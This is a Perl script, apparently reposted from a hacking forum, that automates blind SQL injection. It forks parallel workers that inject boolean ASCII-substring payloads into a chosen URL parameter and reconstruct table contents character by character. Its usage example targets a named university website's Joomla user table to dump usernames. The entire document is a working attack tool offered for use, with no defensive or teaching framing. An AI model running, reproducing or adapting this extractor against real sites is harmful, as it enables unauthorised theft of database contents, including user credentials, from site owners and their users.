- #!/usr/bin/perl
- use LWP::UserAgent;
- use HTML::Parse;
- use HTML::FormatText;
- use Getopt::Long qw(:config no_ignore_case bundling);
- # Blind sql injection.
- # COMMANDLINE.
- GetOptions( 'h=s'=>\$url,'type=s'=>\$type,'p=s'=>\$opt_p,'T=s'=>\$opt_T,'C=s'=>\$opt_C,'threads=i'=>\$threads,'rows=i'=>\$rows );
- if ($type ne 'char' && $type ne 'int') { print "\nYou must enter --type: char or int"; &usage; exit; };
- if (!$opt_p) { print "\nYou must enter the vulnerable paramater."; &usage; exit; };
- if (!$url || !$opt_T | !$opt_C) { &usage; exit; };
- $threads=5 if (!$threads); # default threads
- $rows=100 if (!$rows); # default rows to get
- $start = localtime();
- my $ua=new LWP::UserAgent;
- $ua->timeout(30);
- my $content=$ua->get($url);
- my $orig_page=HTML::FormatText->new->format(parse_html($content->content));
- print "Started $start\n";
- for ($sql_limit=0; $sql_limit<$rows; $sql_limit++)
- {
- @waitlist = (1..1000);
- $end_of_string=0;
- my @word;
- while (@waitlist) {
- for ($count = 0; $count<$threads; $count++) {$current_batch[$count]=shift(@waitlist);}
- foreach $letter (@current_batch) {
- pipe *{$letter},RETHAND;
- unless ($pid = fork()) {
- sub1();
- exit();
- }
- }
- # wait for returned data
- autoflush STDOUT 1;
- foreach $letter (@current_batch) {
- $response = <$letter>;
- $end_of_string=1 if ($response==31);
- $word[$letter]=chr($response);
- printf "\r%3d %1s",$letter,chr($response);
- }
- last if ($end_of_string==1); # end of string - exit loop
- }
- print "\n\n";
- foreach (@word) {
- print "$_";
- }
- print "\n\n";
- last if (ord($word[1])==31); # no more rows - exit loop
- } # increase row / limit
- $end = localtime();
- print "\n\nCompleted $end\n";
- sub sub1 {
- if (defined $letter) {
- my ($lower,$upper)=(31,123);
- while ($upper-$lower>1) {
- my $diff=($upper-$lower)/2;
- $diff=int($diff + .5);
- $diff+=$lower;
- $ua=new LWP::UserAgent;
- $ua->timeout(15);
- $url=~m/(.+[&|\?]$opt_p=.+?)(&.+)/i;
- if ($1) {
- if ($type eq 'int') {
- $content=$ua->get($1 . ' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff . $2);
- } else {
- $content=$ua->get($1 . '\' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff . ' and 1=\'1' . $2);
- }
- } else {
- if ($type eq 'int') {
- $content=$ua->get($url . ' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff);
- } else {
- $content=$ua->get($url . '\' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff . ' and 1=\'1');
- }
- }
- $content=HTML::FormatText->new->format(parse_html($content->content));
- #($content!~m/A4583SL/)?$upper=$diff:$lower=$diff;
- ($content ne $orig_page)?$upper=$diff:$lower=$diff;1
- }
- print RETHAND "$lower\n";
- }
- }
- sub usage
- {
- print "\n";
- print "\nUSAGE : $0 [-h URL] [-p vuln p.] [--type int|char] [-T table name] [-C column name]\n";
- print "\n-h = Host address.";
- print "\n-p = Vulnerable parameter.";
- print "\n--type = vulnerable parameter type; int or char.";
- print "\n-T = Table name.";
- print "\n-C = Column name.";
- print "\n--threads = [optional] number of threads, default is 5";
- print "\n--rows = [optional] number of rows to dump, default is 100";
- print "\n\nEg usage: perl $0 -h \"http://www.cs.teiher.gr/index.php?option=com_juser&task=show_bio&id=88&lang=en\" -T jos_users -C username --type int -p id";
- print "\n\n\n";
- }
- Read more: http://www.ubers.org/Thread-PERL-Blind-SQLi#ixzz3Cm0YlqHk